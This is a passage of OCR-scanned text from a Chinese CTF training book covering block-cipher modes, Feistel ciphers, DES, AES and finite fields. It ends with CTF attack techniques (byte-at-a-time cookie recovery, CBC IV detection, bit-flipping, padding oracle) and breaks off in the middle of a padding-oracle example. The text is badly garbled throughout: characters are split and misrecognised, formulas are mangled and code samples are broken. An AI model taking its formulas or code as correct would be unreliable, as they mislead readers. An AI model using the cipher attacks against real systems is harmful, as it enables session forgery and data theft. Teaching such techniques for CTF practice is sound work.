化 向 量 (Initialization Vector，IV) 的 附加 输入 值 进行 随机 化 ， 以 保证 安全 。 


对 加 密 模式 的 研究 曾经 包含 数据 的 完整 性 保护 ， 即 在 某 些 数据 被 修改 后 的 情况 下 密码 的 误差 传播 特 
性 。 后 来 的 研究 则 将 完整 性 保护 作为 男 一 个 完全 不 同 的 ， 与 加 密 无 关 的 密码 学 目标 。 部 分 现代 的 工作 
模式 用 有 效 的 方法 将 加 密 和 认证 结合 起 来 ， 称 为 认证 加 密 模式 。 


下 31 EC 


ECB (Electronic Code Book， 电 子 密码 本 ) 是 分 组 加 密 最 简单 的 一 种 模式 ， 即 明文 的 每 个 块 都 独 
立地 加 密 成 密 文 的 每 个 块 ， 见 图 7-3-1。 如 果 明 文 的 长 度 不 是 分 组 长 度 的 倍数 ， 则 需要 用 一 些 特定 的 
方法 进行 填充 。 设 明文 为 P 密 文 为 C， 加 密 算法 为 上 解密 算法 为 D， 则 ECB 模 式 下 的 加 密 和 解密 过 程 
可 以 表示 为 : 


CFAHD P= 


ECB 模 式 的 缺点 在 于 同样 的 明文 块 会 被 加 密 成 相同 的 密 文 块 ， 因 此 不 能 很 好 地 隐藏 数据 模式 。 在 某 些 
场合 ， 这 种 方法 不 能 提供 严格 的 数据 保密 性 ， 因 此 并 不 推荐 用 于 密码 协议 。 


了 3 之 人 日 


在 CBC (Cipher Block Chaining， 密 码 分 组 链接 ) 模式 中 ， 每 个 明文 块 先 与 前 一 个 密 文 块 进行 异 或 
(XOR) 后 再 进行 加 密 ， 见 图 7-3-2。 在 这 种 方法 中 ， 每 个 密 文 块 都 依赖 于 它 前 面 的 所 有 了 明文 块 ; 同 
时 ， 为 了 保证 每 条 消息 的 唯一 性 ， 在 第 1 个 块 中 需要 使 用 初始 化 向 量 。 


A— A— 
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图 7-3-2 
设 第 一 个 块 的 下 标 为 1， 则 CBC 的 加 解密 可 以 表示 为 


C0=IV…CF APB C1) 


Co=IV…P= ID (GIG 


7.3.1.3 OFB 


OFB (Output FeedBack， 输 出 反馈 模式 ) 可 以 将 块 密码 变 成 同步 的 流 密 码 ， 将 之 前 一 次 的 加 密 结 
果 使 用 密 钥 再 次 进行 加 密 (第 1 次 对 IV 进 行 加 密 ) ， 产 生 的 块 作为 密 钥 流 ， 然 后 将 其 与 明文 块 进 行 异 
或 ， 得 到 密 文 。 由 于 异 或 (XOR) 操作 的 对 称 性 ， 加 密 和 解密 操作 是 完全 相同 的 ， 见 图 7-3-3。OFB 
模式 的 公式 表示 为 : 


=IV 
OF A O71) 
C=P8O; 


P=CBO; 
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7.3.1.4 CFB 


CFB (Cipher FeedBack， 密 文 反馈 ) 类 似 OFB， 只 不 过 将 上 一 组 的 密 文 作为 下 一 组 的 输入 来 加 密 进 
行 反馈 ， 而 OFB 反 馈 的 是 每 一 组 的 输出 再 次 经 过 加 密 算法 后 的 输出 ， 见 图 7-3-4。 


CFB 的 加 密 与 解密 可 以 表示 为 : 


=IV 
CF=PBA CE1) 


P=CBAC1) 


7.3.1.5 CTR 


CTR 模 式 (Counter Mode，CM) 也 被 称 为 ICM 模 式 (Integer Counter Mode， 整 数 计数 模 
式 ) 、SIC 模 式 (Segmented Integer Counter) 。 与 OFB 类 似 ，CTR 将 块 密码 变 为 流 密码 ， 通 过 递 
增 一 个 加 密 计数 器 来 产生 连续 的 密 钥 流 。 其 中 ， 计 数 器 可 以 是 任意 保证 长 时 间 不 产生 重复 输出 的 函 
数 ， 但 使 用 一 个 普通 的 计数 器 是 最 简单 和 最 常见 的 做 法 。CTR 模 式 的 特征 类 似 OFB， 但 允许 在 解密 时 
进行 随机 存 取 。 


图 7-3-5 中 的 “Nonce” 与 其 他 图 中 的 IV (初始 化 向 量 ) 相同 。IV、 随 机 数 和 计数 器 均 可 以 通过 连 
接 ， 相 加 或 异 或 使 得 相同 明文 产生 不 同 的 密 文 。 


Counter 
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图 7-3-5 


7.3.2 费 斯 妥 密 码 和 DEFE9 


7.3.2.1 费 斯 妥 密 码 


在 密码 学 中 ， 费 斯 妥 密 码 (Feistel Cipher) 用 于 构造 分 组 密码 的 对 称 结构 ， 以 德国 出 生 的 物理 学 家 
和 密码 学 家 Horst Feistel 命 名 ， 通 常 称 为 Feistel 网 络 。 他 在 美国 IBM 工 作 期 间 完成 了 此 项 开拓 性 研 
究 。 多 种 知名 的 分 组 密码 都 使 用 该 方案 ， 包 括 DES、Twofish、XTEA、Blowfish 等 。Feistel 密 码 的 优 
点 在 于 加 密 和 解密 操作 非常 相似 ， 在 某 些 情况 下 甚至 是 相同 的 ， 只 需要 逆转 密 钥 编 排 即 可 。 图 7-3-6 
是 Feistel 密 码 的 加 密 、 解 密 结构 。 


每 组 明文 被 分 为 /0 和 有 启 两 部 分 ， 其 中 局 和 密 铀 key 会 被 作为 参数 传 入 轮 函 数 上 并 将 / 磷 数 的 结果 与 另 
一 部 分 明文 Lo 异 或 得 到 R1， 而 上 1 赋值 为 Ro， 即 对 于 每 轮 有 


LR 
Rir1=Li@F(RiK)) 
经 过 n 轮 操作 后 ， 就 可 以 得 到 密 文 (Rn+1，Ln+1) 。 
解密 其 实 是 把 整个 加 密 操作 逆序 做 一 遍 : 
Ri=Li+1 
LG=Rir1®F(Li+1,K) 
经 过 n 轮 操作 后 ， 就 可 以 得 到 明文 (Lo，Ro) 。 


注意 ，Feistel 密 码 在 每 轮 的 加 密 中 只 加 密 了 一 半 的 字符 ， 而 且 轮 函数 F 并 不 需要 可 遂 。 本 质 上 ， 轮 涪 
数 F 可 以 看 成 一 个 随机 数 生成 器 ， 如 果 每 轮 生成 的 数据 都 没有 办 法 被 了 预测， 那么 攻击 者 目 然 没有 办 法 
以 此 作为 突破 点 对 密码 进行 攻击 。 


ieee | | 
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图 7-3-6 


7.3.2.2 DES 


DES (Data Encryption standard， 数 据 加 密 标准 ) 是 一 种 典型 的 基于 Feistel 结 构 的 加 密 算法 ， 

年 被 美国 国家 标准 局 确定 为 联邦 资料 处 理 标准 (FIPS) ， 随 后 在 国际 上 广泛 应 用 。 DES 是 基于 56 ， 
密 钥 的 对 称 算法 ， 因 为 包含 一 些 机 密 设 计 元 素 ， 密 钥 长 度 相对 较 短 ， 并 且 被 怀疑 内 含 美国 国家 安全 局 
(NSA) 的 后 门 ，DES 算 法 在 刚 推出 时 饱 受 争 议 ， 受 到 了 严密 的 审查 ， 并 推动 了 现代 的 块 密码 及 其 密 
码 分 析 的 上 友 展 。 


1. 初始 置换 (Initial Permutation) 


乍 匈 ，DES 会 对 用 户 的 输入 进行 处 理 ， 称 为 初始 置换 (Initial Permutation) ， 用 户 的 输入 将 会 按照 
表 7-3-1 的 顺序 进行 置换 。 


按照 表 中 的 索引 ， 用 户 输 入 M 的 第 58 位 会 成 为 这 个 过 程 的 结果 IP 的 第 1 位 ，M 的 第 50 位 会 成 为 IP 的 第 2 
位 ， 以 此 类 推 。 下 面 是 一 个 特定 的 输入 M 经 过 IP 后 的 结 


M=0000 0001 0010 0011 0100 0101 0110 0111 1000 1001 1010 1011 1100 1101 1110 ee 
IP=1100 1100 0000 0000 1100 1100 1111 1111 1111 0000 1010 1010 1111 0000 Coo 


将 IP 分 成 等 长 的 左右 两 部 分 ， 可 以 获得 初始 的 L 和 R 的 值 : 
LO=1100 1100 0000 0000 1100 1100 1111 1111 
RO=1111 0000 1010 1010 1111 0000 1010 1010 


2. subkeys 的 生成 


曾 先 ， 传 入 的 原始 key 会 根据 表 7-3-2 置 换 生成 64 位 密 钥 。 表 中 的 第 一 个 数 为 57, 这 意味 有 原委 密 调 
了 本 二 
的 第 57 位 成 为 置换 密 钥 Kkey+ 的 第 1 位 ; 同 理 ， 原 始 密 钥 的 第 49 位 成 为 置换 密 钥 的 第 2 人 位。 注意， 这 
Et 
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四 司 辐 于 车 罩 国 于 本 于 属国 区 呈 导 于 
下 面 是 一 个 输入 的 key 被 转换 成 置换 密 钥 Kkey+ 的 一 个 例子 : 


key=00010011 00110100 01010111 01111001 10011011 10111100 11011111 


key+=1111000 0110011 0010101 0101111 0101010 1011001 1001111 0001111 
得 到 key+ 后， 再 将 其 分 成 两 部 分 一 一 C0 和 D0: 
CO=1111000 0110011 0010101 0101111 


DO=0101010 1011001 1001111 0001111 


得 到 C0 和 D0 后 ， 对 C0 和 D0 进 行 循环 左 移 操作 ， 即 可 得 到 C1 ~ C16 和 D1 ~ D16 的 值 ， 每 一 次 循环 移 
位 的 位 数 分 别 如 下 : 


1122222212222221 


例如 ， 对 于 之 前 的 C0 和 和 D0， 第 一 轮 对 其 进行 循环 左 移 一 位 操作 ， 即 可 得 到 C1 和 和 D1， 而 在 C1 和 D1 的 
基础 上 继续 循环 左 移 一 位 ， 即 可 得 到 C2 和 D2。 


C1=1110000110011001010101011111 
D1=1010101011001100111100011110 
C2=1100001100110010101010111111 


D2=0101010110011001111000111101 


接 下 来 ， 将 每 组 Cn 和 Dn 进 行 组 合 ， 融 得 到 了 16 组 数据 ， 每 组 数据 有 256 位 。 最 后 将 每 组 数据 按照 表 7- 
3-3 的 索引 进行 替换 ， 束 可 以 得 到 K1 ~ K16。 


比如 ， 对 于 之 前 提 到 的 C1D1 ， 通 过 计算 可 以 得 到 对 应 的 K1 : 
C1D1=1110000 1100110 0101010 1011111 1010101 0110011 0011110 0011110 
K1=000110 110000 001011 101111 111111 000111 000001 110010 
3. 轮 函数 
DES 中 使 用 的 轮 消 数 F 结 构 见 图 7-3-7。 


Half Block (32 brts) Subkey (48 bits} 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek72b327f023972b32a1f7e2d 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读书 


图 7-3-7 (来 自 Wikipedia-DES) 
每 轮 的 输入 会 进入 E 国 数 并 扩展 成 48 位 ， 扩 展 的 方法 与 前 面 所 使 用 的 索引 著 换 是 一 样 的 ， 蔷 换 时 直接 
按照 表 7-3-4 进 行 索 引 即 可 。 


下 面 是 一 个 输入 被 E 销 数 扩展 的 例子 : 
RO=1111 0000 1010 1010 1111 0000 1010 1010 
E(RO)=011110 100001 010101 010101 011110 100001 010101 010101 


完成 扩展 后 ， 这 个 输入 会 与 对 应 的 subkeys 进 行 异 或 ， 得 到 48 位 的 数据 。 这 48 位 分 为 8 组 ， 每 组 6 位 ， 

分 别 去 泰 引 S1 ~ 38 数组 中 对 应 的 元 素 。 而 31 ~ S8 中 元 素 的 大 小 都 在 0 ~ 12 泡 围 ， 即 4 位 。 最 后 ， 这 
8 个 4 位 的 数 会 极 重 新 拼 起 来 ， 成 为 一 个 32 位 的 数据 ， 再 经 过 置换 操作 得 到 F 冰 数 的 输出 。 这 里 的 置换 
操作 与 表面 没有 区 别 ， 只 不 过 是 索引 的 表 妆 了 ， 所 以 不 再 警 述 。 


7.3.2.3 例题 


【 例 7-3-1】2018 N1CTF N1ES9， 题 目 给 出 了 加 密 用 的 密 铀 和 具体 的 加 密 算 法 ， 需 要 参赛 者 逆 推 解密 
算法 。 加 密 算法 的 核心 代码 如 下 : 


def 有 人 
f = Lambda V: XxX+y-2*(x&y) 


res 
for i in range(len 
chr(Cf(o ee 1 ]), ord(b[i]))) 
es 


pos 
ed pe 18001**x) % (Qx7f)) 


lass : 
ig - subkey(self): 
ing_to_bits(self.key) 
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end(o) 
0 = string_to_bits([chr(c) for c in o[0:24]]) 
setf.Kn = [] 
for i in range(32): 
self.Kn.append(map(chr, k[i * 8: i * 8 + 8])) 
return 
def encrypt(self, plaintext): 
for i in range(len(plaintext) / 16): 
block = plaintext[i * 16:(i + 1) * 16] 
L = block[:8] 
R = block[8:] 
or round_cnt in range(32): 
L, R= R, (round_add(L, self.Kn[round_cnt])) 


代码 明显 是 一 个 Feiste| 的 结构 ， 其 中 F 函 数 为 round_add， 只 不 过 没有 进行 异 或 操作 ， 而 是 直接 把 F 辑 
数 的 输出 作为 每 轮 加 密 的 结果 。 


编写 解密 代码 比较 容易 ， 基 本 上 是 把 加 密 沙 数 的 代码 抄 一 进 ， 然 后 将 子 密 钥 翻 转 ， 把 每 轮 使 用 的 子 密 
钥 对 应 上 即 可 : 


def decrypt(self,ciphertext): 
res="'' 


for i in range(len(ciphertext) / 16): 
block = ciphertext[i * 16:(i + 1) * 16] 
L = block[:8] 


R = block[8:] 
for round_cnt in range(32): 
L, R =R, (round_add(L, self.Kn[31-round_cnt])) 


7.3.3 AES 


AES (Advanced Encryption Standard) 又 称 为 Rijndael 加 密 法 ， 是 美国 政府 曾 采 用 的 一 种 分 组 加 
CN SE AG NE OE 
的 结构 ， 它 在 每 轮 都 对 全 部 的 128 位 进行 了 加 密 。AES 的 加 密 过 程 是 在 一 个 4x4 字 节 大 小 的 和 矩阵 上 运 
作 的 ， 这 个 算 阵 又 称 为 “ 体 (state) ”， 其 初 值 是 一 个 明文 区 块 (矩阵 中 的 一 个 元 素 融 是 明文 区 块 中 
的 1 Byte) 。 


各 轮 AES 加 密 循环 ( 除 最 后 一 轮 外 ) 均 包含 4 个 步骤 : 


(1) AddRoundKey: 矩阵 中 的 每 字 节 都 与 该 回合 密 钥 (round key) 做 XOR 运 算 ， 每 个 子 密 钥 由 密 
钥 生 成 方案 产生 。 


(2) SubBytes: 透 过 一 个 非 线性 的 茶 换 函数 ， 用 得 找 表 的 方式 把 每 字 节 蔡 换 成 对 应 字 书 。 
(3) shiftRows: 将 和 矩阵 中 的 每 个 模 列 进行 循环 式 移 位 。 


(4) MixColumns : 充分 混合 乱 阵 中 各 列 的 操作 ， 使 用 线性 转换 混合 每 列 的 4 字 节 。 最 后 一 个 加 密 循 
环 中 省 略 本 步 又， 而 以 AddRoundKey 取 代 。 


因为 AES 的 部 分 操作 是 在 有 限 域 上 完成 的 ， 所 以 我 们 需要 了 解 有 限 域 的 相关 知识 。 


7.3.3.1 有 限 域 


有 限 域 (Finite Field) 是 包含 有 限 个 元 素 的 域 ， 可 以 简单 理解 为 包含 有 限 个 元 素 的 集合 ， 其 中 可 以 
对 包含 的 元 素 执 行 如 、 减 、 乘 、 除 等 操作 。 

在 密码 学 中 ， 有 限 域 G6F (p) 是 一 个 重要 的 域 ,其 中 p 为 素数 。 简 时 来 说，GF (p) =modp， 因 为 一 
个 数 对 p 取 模 后 ， 结 果 肯 定 在 [0，p-1] 区 | 间 内 。 对 于 域 中 的 元 素 a 和 b, (a+b) modp 和 (a*b) mod 
p 的 结果 都 是 域 中 的 元 素 。GF (p) 中 的 加 法 和 乘法 与 一 般 的 加 法 和 乘法 相同 ， 只 是 模 上 了 p， 但 减法 
和 除法 利用 其 负 元 素 进行 运算 。 任 意 元 素 3ae GF (q) 有 乘法 逆 元 素 a” 和 加 法 负 元 素 -a， 使 得 a* (a 
1) =e 和 a+ (-a) =0。 
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乘法 逆 元 的 求解 方法 需要 使 用 扩展 欧 几 里 得 算法 ( 轧 转 相 除 法 ) 。 假 设 a*x+b*y=1， 同 时 两 边 对 b 取 
模 ， 则 a*x+b*y=1 (modb) ， 即 a*x=1 (modb) 。x 就 是 a (modb) 的 逆 元 ， 同 理 ，y 是 b (mod 
a) 的 逆 元 。 


通过 收集 轧 转 相 除 法 中 产生 的 式 子 倒序 即 可 得 到 整个 式 子 的 整数 解 。 例 如 ，3x+11y=1， 先 利用 轧 转 
相 除 法 可 以 得 到 如 下 陈 子 : 


11=3x3+2 
3=2x1+1 
再 将 其 改写 成 余数 形式 : 


1=2x(-l)+3x]1 
2 三 3X( 一 3) 上 11x1 


i mo 


1=[3x(-3)+11x1]x(-1)+3x1 


3x4+11x(-1)=1 
此 时 已 经 得 到 了 x 的 解 为 4， 即 3 模 11 的 复元 。 


当然 ， 有 限 域 上 的 各 种 运算 其 实 不 用 手动 去 求解 ， 现 有 的 很 多 工具 包含 了 有 限 域 的 相关 运算 ， 可 以 直 


接 利 用 这 些 工 具 进 行 运算 。 


【 例 7-3-2】SUCTF 2018 Magic， 题 目的 核心 代码 如 下 : 


def getMagic(): 
magic = [] 
With open("magic.txt") as f: 
while True : 
Line = f.readline() 
if (line): 
Line = int(Line，16) 
magic.append(Line) 
else: 
break 
return magic 
def playMagic(magic, key): 
cipher = 0 
for i in range(len(magic)): 
cipher = cipher << 1 
t = magic[i] & key 


cipher = cipher ^ <c 

return cipher 

def main(): 

key = flag[5:-1] 

assert len(key) == 32 

key = key.encode("hex") 

key = int(key, 16) 

magic = getMagic() 

cipher = playMagic(magic, key) 

cipher = hex(cipher)[2:-1] 

With open("cipher.txt", "w") as f: 
f.write(cipher + "\n") 


magic 文 件 中 存储 着 256 个 十 六 进 制 数 ， 整 个 代码 的 加 密 逻 辑 是 将 每 轮 的 数 与 明文 进行 按 位 与 操作 ， 
再 逐 位 进行 异 或 ， 最 后 将 结果 输出 。 人 逻辑 上 的 异 或 、 与 操作 是 不 是 可 以 在 GF (2) 上 有 等 价 的 运算 操 
作 呢 ? 异 或 的 运算 规律 如 下 : 


0@1=1 0+1(mod2)=1 
0@0=0 0+0(mod2)=0 


ee 二 
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可 以 发 现 ， 异 或 操作 其 实 等 价 于 GF (2) 上 的 相 加 。 同 样 ， 按 位 与 操作 等 价 于 GF (2) 上 的 乘法 。 通 
过 这 样 的 变换 ， 整 个 脚本 实质 上 是 一 个 GF (2) 上 256 元 的 线性 方程 组 ， 解 线性 方程 组 最 好 的 办 法 是 


对 系数 矩阵 的 逆 矩 阵 进 行 求解 。 


sage 中 有 方便 在 有 限 域 上 对 算 阵 求 逆 的 万 法 ， 上 有 具体 代 码 如 下 : 


sage: a = matrix(GF(2)，[[1,1]，[1,9]]) 


sage: 
[9 1] 
Way 


在 解 得 系数 炬 阵 的 逆 后 ， 和 直接 与 密 文 相 来 即 可 得 到 明文 。 


7.3.3.2 Rijndael 密 钥 生 成 

AES 的 加 密 过 程 中 用 到 的 并 不 是 输入 的 128 ~ 256 位 的 短 密 钥 ， 而 是 基于 该 短 密 钥 生 成 的 一 系列 子 密 
钥 ,通过 原 密 钥 生 成 子 密 钥 的 算法 称 为 Rijndael 密 钥 生 成 方案 (Rijndael Key Schedule) 。 每 轮 
中 ， 数 据 都 需要 与 128 位 的 子 密 钥 异 或 ， 根 据 原 始 密 钥 生 成 各 轮子 密 钥 的 过 程 是 由 Rijndael 密 钥 生 成 
方案 完成 的 。 


假设 key 为 如 下 矩阵: 


Sa 33 37 20 
U3 3b $56 32 
f6 Se 7d S$a 
17 e2 bs8 70 


先 取出 最 后 一 行 |17 e2 b8 70|， 进 行 循 环 左 移 ， 变 为 le2 b8 70 17|; 再 对 3 使 进行 索引， 变 为 |cd 
ee 77|。 然 后 ， 把 第 一 位 与 Rcon 数 组 中 的 第 一 个 元 素 异 或 操作 ，Rcon 是 一 个 预先 定义 好 的 数组 ， 
其 中 的 第 项 是 2 在 GF (2^8) 下 的 i-1 次 万 。 


GF (2^8) 扩展 域 下 的 运算 与 GF (2) 的 同 理 ， 在 扩展 域 中 ， 把 一 个 数 看 成 一 个 7 次 多 项 了 式 : 
多 项 式 : x6+x4+Xx+1 二 进 制 : {01010011} 十 进 制 : {53} 


可 以 看 到 ， 多 项 式 中 每 个 系数 相当 于 二 进 制 中 对 应 的 位 ， 所 以 可 以 把 GF (8) 下 的 运算 直接 转换 成 多 
项 式 之 间 的 运算 。 但 是 运算 的 结果 可 能 超过 255， 所 以 需要 对 这 些 超过 学 围 的 数 进行 化 简 。 在 之 前 讲 
的 GF (2) 中 ， 和 直接 把 结果 对 2 取 模 ,， 但 在 拓展 域 中 直接 规定 了 一 个 多 项 式 ， 两 个 多 项 式 相 乘 的 结 
直接 对 该 多 项 式 取 模 即 可 。 在 AES 中 米 用 了 以 下 多 项 式 : 


pO)=XS+Xt+x3 +X+1 
Rcon 第 9 项 可 以 用 如 下 万 法 来 计算 : 
x3=p(X+X4+x3+x+1 一 X8= (xX4+x3+x+1) modp(X) 
所 以 第 9 项 对 应 的 多 项 式 为 X4+x3+Xx+1， 换 算 成 十 进 制 数 就 是 27。 


这 样 得 到 Rcon 数 组 中 的 每 一 项 ， 对 于 之 前 得 到 的 数据 |cd 36 ee 77|， 将 其 第 1 位 与 Rcon[1] 进 行 异 或 
操作 ， 得 到 |cc 36 ee 77|， 将 这 组 与 第 一 行 的 数据 |5a 55 57 20| 进 行 异 或 ， 就 可 以 得 到 下 一 轮子 密 
钥 的 第 一 行 |96 63 b9 57| 了 。 
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接 下 来 ， 第 二 轮子 密 钥 的 第 2 行 等 于 第 二 轮子 密 钥 的 第 1 行 与 第 一 轮子 密 钥 的 第 2 行进 行 异 或 操作 的 结 
果 。 第 二 轮 第 3 行 和 第 4 行 的 密 钥 也 一 样 ， 详 细 的 步骤 见 图 7-3-8。 


最 后 经 过 10 轮 运算 ， 融 可 以 得 到 AEs 每 轮 所 使 用 的 子 密 铀 了 。 


图 7-3-8 


7.3.3.3 AES 步 又 
(1) AddRoundKey ( 轮 密 钥 加 ) : 把 输入 和 对 应 轮 数 的 子 密 钥 进 行 异 或 操作 。 


(2) SubBytes ( 字 证 代 换 ) : 矩阵 中 的 各 字 市 通过 一 定 的 变换 与 5_box 中 对 应 的 元 素 进 行 些 换 。 例 
如 ， 对 data 进 行 蔡 换 的 伪 代 码 如 下 : 


row = (data & Oxf0) >> 4; 


本 步骤 的 逆 也 比较 简单 ， 找 到 数据 在 s_box 中 的 系 引 ， 然 后 还 原 即 可 。 为 了 至 表 方便 ， 我 们 可 以 预先 
准备 好 s_box 的 逆 变 换 数 组 inv_sbox， 来 对 应 数据 在 s_box 中 的 率 引 。 


(3) shiftRows ( 行 移 位 ) : 将 息 阵 按照 如 下 规则 进行 移 位 操作 : 


左 移 1 位 
左 移 2 位 
左 移 3 位 


本 步骤 的 逆 操 作 是 把 左 移 操 作 换 成 右 移 操作 即 可 。 


(4) MixColumns ( 列 渴 合 ) : 把 输入 的 每 列 看 做 一 个 同 量 ， 然 后 与 一 个 固定 的 矩阵 在 GF (2^8) 
扩展 域 上 相 乘 ， 这 个 固定 的 矩阵 其 实 是 由 向 量 |2 1 1 3| 通 过 逐 位 变换 得 到 的 。 乘 以 一 个 和 矩 阵 的 逆 操 作 
只 用 乘 以 该 算 阵 的 拨 矩 阵 即 可 。 


对 于 本 步骤 的 逆 操 作 ， 同 样 可 以 用 sage 在 GF (2^8) 上 求 得 对 应 的 逆 矩 阵 : 


sage: k.<a> = GF(2)[] 

sage: L.<x> = GF(2*8, modulus = a"8 +a"H + a3+a+1) 
age: res = 

ag 


sage: for i in xrange(d): 
res2 = [] 


ts L213] 
for j in xrange(4) : 
res2.append(L.fetch_int(t[(j+i)%4]7)D) 
res.append(res2) 
sage: res = Matrix(res) 
sage: res 
[ 和 1x+1] 
BE JSXE x] 
es x 1] 
[ 
s 
[ 
『 


x+1 x TL 1] 
age: res.inverse() 
x 


“3+ XxX"2+X xX"3+XxX+1x*3+x"2+1 X43 4 IJ 
‘2 + YAI + Y] 
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虽然 在 密码 学 题目 中 专门 考察 本 步骤 的 题目 比较 少 ， 但 是 在 逆向 题目 中 出 现 的 频率 并 不 低 ， 类 似 题目 
可 以 参考 CISCN 2017 的 re450 Gadgetzan。 


7.3.3.4 常见 攻击 


1. Byte-at-a-Time 


例如 ， 对 于 pwnable.kr 的 crypto1 ， 核 心 代码 如 下 : 


BLOCK_SIZE = 16 
PADDING = '\x00' 
pad = lambda s: s + (BLOCK_SIZE -~ len(s) % BLOCK_SIZE) * PADDING 
EncodeAES = lambda c，s: c.encrypt(pad(s)).encode('hex') 
DecodeAES = lambda c，e: c.decrypt(e.decode('hex')) 
key = 'erased. but there is something on the real source code' 
iv = 'erased. but there is something on the real source code' 
cookie = 'erased. but there is something on the real source code' 
def AES128_CBC(msg): 
cipher = AES.new(key, AES.MODE_CBC, iv) 
return DecodeAES(cipher, msg).rstrip(PADDING) 
def authenticate(e_packet): 
packet = AES128_CBC(e_packet) 
id = packet.split('-')[0] 
pw = packet.split('—')[1] 
if packet.split('-')[2] != cookie: 
return 0 # request is not originated from expected server 
if hashlib.sha256(id+cookie).hexdigest() == pw and id == 'guest': 
return 1 
if hashlib.sha256(id+cookie).hexdigest() == pw and id == 'admin': 
return 2 
return 0 
def request_auth(id, pw): 
packet = '{0}-{1}-{2}'.format(id, pw, cookie) 
e_packet = AES128_CBC(packet) 
print 'sending encrypted data ({0})'.format(e_packet) 
return authenticate(e_packet) 


本 题目 需要 成 功 通 过 验证 让 服务 器 认为 我 们 是 admin 用 户 才 能 拿 到 flag。request auth 函 数 的 程序 会 
打印 加 密 后 的 packet， 我 们 能 够 控制 这 个 包 中 的 id 和 pw。 


AES_CBC 模 式 的 第 一 个 块 加 密 的 数据 是 明文 异 或 IV 后 的 数据 ， 而 IV 是 确定 的 ， 所 以 相同 的 数据 加 密 出 
来 的 结果 一 定 是 一 样 的 。 可 以 利用 这 个 特性 ， 先 构造 一 组 数据 ， 使 得 “id-pw-” 的 长 度 为 15， 最 后 1 
位 会 被 填 成 cookie 的 第 1 位 ， 见 图 7-3-9。 这 时 可 以 获取 整个 块 加 密 后 的 结果 ， 表 将 之 前 Cookie 的 第 1 
位 填 上 目 己 构造 的 数据 ， 见 图 7-3-10。 


图 7-3-10 
如 果 此 时 上 自己 构造 的 数据 的 加 密 结果 恰好 等 于 之 前 的 加 密 结果 ， 证 明 用 来 加 密 的 数据 与 之 前 的 数据 一 
样 ， 由 此 可 以 探测 出 cookie 的 第 1 位 ， 用 同样 的 方法 可 以 逐 字 节 获 取 完 整 的 cookie。 


不 仅 CBC 模 式 ，ECB 模 式 下 的 加 密 也 可 以 使 用 这 种 攻击 方式 。 

2. CBC-IV-Detection 

awry Ye NE MIEN :=p :0 
P1=D(C1)@IV 


P2=D(C2)@C1 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek72b327f023972b32a1f7e2d 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


Pp3=D(C3)@®C> 
假设 此 时 的 C1 和 C3 相等 ， 并 且 C2 为 一 个 全 0 的 块 : 
ETM 
P=D("\x00*BLOCK LEN)@C’ 
Pp3=D(C1)@("\x00*BLOCK LEN)=D(C1) 
此 时 可 以 知道 D 〈C1) 的 值 ， 把 这 个 值 与 P1 异 或 即 可 得 到 |V 的 值 。 
3. CBC-Bit-Flipping 


此 攻击 企 Web 题 中 比较 单 见 ， 在 可 以 任意 控制 密 文 的 情况 下 ， 通 过 改变 密 文中 的 前 一 个 块 中 的 密 文 来 
影响 后 一 个 块 的 解密 出 的 明文 ， 见 图 7-3-11。 


密 文 
LDL 


Key 


图 7-3-11 
密 文 经 过 解密 函数 后 ， 会 与 前 一 个 块 的 密 文 进行 异 或 操作 ， 从 而 控制 后 一 个 块 解密 出 的 明文 。 当 然 ， 
因为 改变 了 第 一 组 数据 的 密 文 ， 所 以 第 一 组 数据 经 过 解密 国 数 的 数据 无 法 控制 ， 信 呈 如 宁 可 过 和 
， 同 样 可 以 控制 第 一 组 数据 解密 出 来 的 结果 : 


encl = aes_enc(key,iv,'a' * 32) 


enc2 = chr(ord(enc1[0]) ^ 3) + encl[1:] 


如 代码 所 示 ， 加 密 后 的 数据 第 1 字 节 与 3 异 或 (a 和 b 字 符 异 或 的 结果 为 3) ， 再 将 其 进行 解密 操作 ， 可 
以 看 到 第 二 块 的 明文 中 第 1 字 节 字符 a 已 经 变 成 了 b。 


4.CBC-Padding-Oracle 
假设 我 们 能 够 与 服务 器 进行 交互 ， 并 且 可 以 从 服务 器 得 知 Padding ( 填 序 ) 是 否 正常 ， 束 可 能 利用 此 


种 攻击 方式 。 在 使 用 分 组 密码 算法 时 ， 数 据 是 分 组 进行 加 密 的 ， 而 不 足 部 分 一 般 会 使 用 图 7-3-12 所 示 
的 Padding 方 法 (PKCS # 7 填充 算法 ) 。 


图 7-3-12 


解密 时 ， 如 果 Padding 不 正确 ， 服 务 器 会 抛 出 异常 。 如 果 能 获得 密 文 Y， 此 时 构造 密 文 C=F+Y， 束 可 
以 使 用 类 似 CBC-Bit-Flipping 的 技巧 ， 通 过 修改 该 [的 最 后 1 字 节 ， 来 改变 Y 解 密 出 来 的 明文 最 后 1 字 记 
的 值 。 
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一 般 情 况 下 ，F 会 被 设置 成 随机 值 ， 那 么 有 很 大 可 能 性 ， 当 Y 解 密 的 最 后 1 字 节 为 \X01' 时 ， 才 不 会 出 
现 Padding 错 误 的 情况 。 如 果 倒 数 第 2 字 节 解密 结果 为 '\X02'，Y 最 后 1 字 忆 解密 的 结果 是 "\x02'， 也 
1 EA 


当 探测 到 不 会 报错 的 F (n-1) 的 值 时 ， 可 以 用 下 面 的 公式 算出 Y 最 后 1 字 节 对 应 的 明文 : 
P (n-1) =0x19F (n-1) @ 原 始 的 F (n-1) 


获取 到 最 后 1 字 忆 值 后 ， 可 以 通过 同样 的 方式 去 探测 其 他 字 世 的 值 。 这 样 可 以 获得 密 文 [经 过 解密 函数 

后 的 结果 。 除 此 之 外 ， 如 果 能 够 控制 加 密 所 使 用 的 IV,， 还 可 以 利用 己 Bit-Flipping 相 似 的 按 巧 来 修改 
， 从 而 控制 解密 出 的 明文 。 注 意 ， 在 CTF 中 遇 到 的 题目 一 般 都 不 会 是 标准 的 Padding Oracle 
， 需 要 根据 不 同 的 情况 灵活 进行 调整 。 


这 里 以 RCTF 2019 的 baby_crypto 为 例 讲 解 Padding-Oracle 攻 击 的 用 法 。 程 序 的 主要 远 辑 如 下 : 


key = os.urandom(16) 
iv = os.urandom(16) 
salt = Key 
oo # 获取 用 户 输 入 的 username 和 password 
cookie = b"admin:0;username:%s;password:%s" %(username.encode(), password.encode()) 
hv = shal(salt +cookie) 
print("Your cookie:") 
ee # 输出 AES 加 密 后 的 cookie、iv、hv 
while True : 
try : 
print("Input your cookie:") 
